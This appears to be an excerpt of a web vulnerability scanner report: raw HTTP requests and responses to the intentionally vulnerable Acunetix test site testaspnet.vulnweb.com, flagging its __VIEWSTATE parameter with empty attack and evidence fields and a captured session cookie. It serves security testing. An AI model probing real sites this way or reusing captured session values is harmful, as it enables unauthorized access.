Request Body - size: 1,117 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8318&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOeI%2Fo9oIHgJTRBYBBgDA8F9SqtoIZGRkYqLrwYHiGqf5j1KLNrt2wlfg%2FCo%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLB7Iy8BwLiidrKBQL%2BkPzjAQLX2ajvAgLX2ajvAgLX2dyDCgLX2dyDCgLX2fCmAwLX2fCmAwLX2eT9DALX2eT9DALX2ZiQBALX2ZiQBALX2cz5AgLX2cz5AgLX2eCcCgLX2eCcCgKo4PKFDQKo4PKFDQKo4ObYBgKo4ObYBgKo4Jr%2FDwKo4Jr%2FDwKo4I6SBwKo4I6SBwKo4KIpAqjgoikCqODWzQkCqODWzQkCqODK4AICqODK4AICqOD%2BhwoCqOD%2BhwoCqODS7AgCqODS7AgCqODGAwKo4MYDAo330KgDAo330KgDAo33xM8MAo33xM8MAo33%2BOIFAo33%2BOIFAo337LkNAo337LkNAo33gNwGAo33gNwGAo33tPMPAo33tPMPAo33qJYHAo33qJYHAo333CoCjffcKgKN97CSDQKN97CSDQKN96SpBgKN96SpBgLmnbfeCQLmnbfeCQLmnav1AgLmnav1AgLmnd%2BJCgLmnd%2BJCgLmnfOsAwLmnfOsAwLmnefDDALmnefDDALmnZvmBQLmnZvmBQLmnY%2B9DQLmnY%2B9DQLmnaPQBgLmnaPQBgLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0%2FAvukvT8C%2B6TR0wkC%2B6TR0wkC%2B6TF9gIC%2B6TF9gKKmHOOSYavzlu7%2B%2FSIvgowOvBkEg%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:20:30 GMT Content-Length: 12597
Response Body - size: 12,597 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOeI/o9oIHgJTRBYBBgDA8F9SqtoIZGRkYqLrwYHiGqf5j1KLNrt2wlfg/Co=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLB7Iy8BwLiidrKBQL+kPzjAQLX2ajvAgLX2ajvAgLX2dyDCgLX2dyDCgLX2fCmAwLX2fCmAwLX2eT9DALX2eT9DALX2ZiQBALX2ZiQBALX2cz5AgLX2cz5AgLX2eCcCgLX2eCcCgKo4PKFDQKo4PKFDQKo4ObYBgKo4ObYBgKo4Jr/DwKo4Jr/DwKo4I6SBwKo4I6SBwKo4KIpAqjgoikCqODWzQkCqODWzQkCqODK4AICqODK4AICqOD+hwoCqOD+hwoCqODS7AgCqODS7AgCqODGAwKo4MYDAo330KgDAo330KgDAo33xM8MAo33xM8MAo33+OIFAo33+OIFAo337LkNAo337LkNAo33gNwGAo33gNwGAo33tPMPAo33tPMPAo33qJYHAo33qJYHAo333CoCjffcKgKN97CSDQKN97CSDQKN96SpBgKN96SpBgLmnbfeCQLmnbfeCQLmnav1AgLmnav1AgLmnd+JCgLmnd+JCgLmnfOsAwLmnfOsAwLmnefDDALmnefDDALmnZvmBQLmnZvmBQLmnY+9DQLmnY+9DQLmnaPQBgLmnaPQBgLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0/AvukvT8C+6TR0wkC+6TR0wkC+6TF9gIC+6TF9gKKmHOOSYavzlu7+/SIvgowOvBkEg==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8279')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">October 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8303')" style="color:Black" title="September 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8304')" style="color:Black" title="September 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8305')" style="color:Black" title="September 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8306')" style="color:Black" title="September 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8307')" style="color:Black" title="September 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8308')" style="color:Black" title="September 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8309')" style="color:Black" title="October 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8310')" style="color:Black" title="October 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8311')" style="color:Black" title="October 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8312')" style="color:Black" title="October 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8313')" style="color:Black" title="October 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8314')" style="color:Black" title="October 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8315')" style="color:Black" title="October 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8316')" style="color:Black" title="October 08">8</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8317')" style="color:Black" title="October 09">9</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8318')" style="color:White" title="October 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8319')" style="color:Black" title="October 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8320')" style="color:Black" title="October 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8321')" style="color:Black" title="October 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8322')" style="color:Black" title="October 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8323')" style="color:Black" title="October 15">15</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8324')" style="color:Black" title="October 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8325')" style="color:Black" title="October 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8326')" style="color:Black" title="October 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8327')" style="color:Black" title="October 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8328')" style="color:Black" title="October 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8329')" style="color:Black" title="October 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8330')" style="color:Black" title="October 22">22</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8331')" style="color:Black" title="October 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8332')" style="color:Black" title="October 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8333')" style="color:Black" title="October 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8334')" style="color:Black" title="October 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8335')" style="color:Black" title="October 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8336')" style="color:Black" title="October 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8337')" style="color:Black" title="October 29">29</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8338')" style="color:Black" title="October 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8339')" style="color:Black" title="October 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8340')" style="color:Black" title="November 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8341')" style="color:Black" title="November 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8342')" style="color:Black" title="November 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8343')" style="color:Black" title="November 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8344')" style="color:Black" title="November 05">5</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1115 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,115 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8322&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOeI%2Fo9oIHgJTRBYBBgDAlwl3rdoIZGRkXgxZeP%2BKwWzk89IL7SpX1TCh%2BLs%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKcq4j3DALiidrKBQL%2BkPzjAQLX2ajvAgLX2ajvAgLX2dyDCgLX2dyDCgLX2fCmAwLX2fCmAwLX2eT9DALX2eT9DALX2ZiQBALX2ZiQBALX2cz5AgLX2cz5AgLX2eCcCgLX2eCcCgKo4PKFDQKo4PKFDQKo4ObYBgKo4ObYBgKo4Jr%2FDwKo4Jr%2FDwKo4I6SBwKo4I6SBwKo4KIpAqjgoikCqODWzQkCqODWzQkCqODK4AICqODK4AICqOD%2BhwoCqOD%2BhwoCqODS7AgCqODS7AgCqODGAwKo4MYDAo330KgDAo330KgDAo33xM8MAo33xM8MAo33%2BOIFAo33%2BOIFAo337LkNAo337LkNAo33gNwGAo33gNwGAo33tPMPAo33tPMPAo33qJYHAo33qJYHAo333CoCjffcKgKN97CSDQKN97CSDQKN96SpBgKN96SpBgLmnbfeCQLmnbfeCQLmnav1AgLmnav1AgLmnd%2BJCgLmnd%2BJCgLmnfOsAwLmnfOsAwLmnefDDALmnefDDALmnZvmBQLmnZvmBQLmnY%2B9DQLmnY%2B9DQLmnaPQBgLmnaPQBgLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0%2FAvukvT8C%2B6TR0wkC%2B6TR0wkC%2B6TF9gIC%2B6TF9gIno9Tnx8fHosIe9TBpbQZYMxBs9Q%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:32:10 GMT Content-Length: 12597
Response Body - size: 12,597 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOeI/o9oIHgJTRBYBBgDAlwl3rdoIZGRkXgxZeP+KwWzk89IL7SpX1TCh+Ls=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKcq4j3DALiidrKBQL+kPzjAQLX2ajvAgLX2ajvAgLX2dyDCgLX2dyDCgLX2fCmAwLX2fCmAwLX2eT9DALX2eT9DALX2ZiQBALX2ZiQBALX2cz5AgLX2cz5AgLX2eCcCgLX2eCcCgKo4PKFDQKo4PKFDQKo4ObYBgKo4ObYBgKo4Jr/DwKo4Jr/DwKo4I6SBwKo4I6SBwKo4KIpAqjgoikCqODWzQkCqODWzQkCqODK4AICqODK4AICqOD+hwoCqOD+hwoCqODS7AgCqODS7AgCqODGAwKo4MYDAo330KgDAo330KgDAo33xM8MAo33xM8MAo33+OIFAo33+OIFAo337LkNAo337LkNAo33gNwGAo33gNwGAo33tPMPAo33tPMPAo33qJYHAo33qJYHAo333CoCjffcKgKN97CSDQKN97CSDQKN96SpBgKN96SpBgLmnbfeCQLmnbfeCQLmnav1AgLmnav1AgLmnd+JCgLmnd+JCgLmnfOsAwLmnfOsAwLmnefDDALmnefDDALmnZvmBQLmnZvmBQLmnY+9DQLmnY+9DQLmnaPQBgLmnaPQBgLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0/AvukvT8C+6TR0wkC+6TR0wkC+6TF9gIC+6TF9gIno9Tnx8fHosIe9TBpbQZYMxBs9Q==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8279')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">October 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8303')" style="color:Black" title="September 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8304')" style="color:Black" title="September 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8305')" style="color:Black" title="September 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8306')" style="color:Black" title="September 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8307')" style="color:Black" title="September 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8308')" style="color:Black" title="September 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8309')" style="color:Black" title="October 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8310')" style="color:Black" title="October 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8311')" style="color:Black" title="October 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8312')" style="color:Black" title="October 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8313')" style="color:Black" title="October 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8314')" style="color:Black" title="October 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8315')" style="color:Black" title="October 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8316')" style="color:Black" title="October 08">8</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8317')" style="color:Black" title="October 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8318')" style="color:Black" title="October 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8319')" style="color:Black" title="October 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8320')" style="color:Black" title="October 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8321')" style="color:Black" title="October 13">13</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8322')" style="color:White" title="October 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8323')" style="color:Black" title="October 15">15</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8324')" style="color:Black" title="October 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8325')" style="color:Black" title="October 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8326')" style="color:Black" title="October 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8327')" style="color:Black" title="October 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8328')" style="color:Black" title="October 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8329')" style="color:Black" title="October 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8330')" style="color:Black" title="October 22">22</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8331')" style="color:Black" title="October 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8332')" style="color:Black" title="October 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8333')" style="color:Black" title="October 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8334')" style="color:Black" title="October 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8335')" style="color:Black" title="October 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8336')" style="color:Black" title="October 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8337')" style="color:Black" title="October 29">29</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8338')" style="color:Black" title="October 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8339')" style="color:Black" title="October 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8340')" style="color:Black" title="November 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8341')" style="color:Black" title="November 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8342')" style="color:Black" title="November 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8343')" style="color:Black" title="November 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8344')" style="color:Black" title="November 05">5</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1115 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
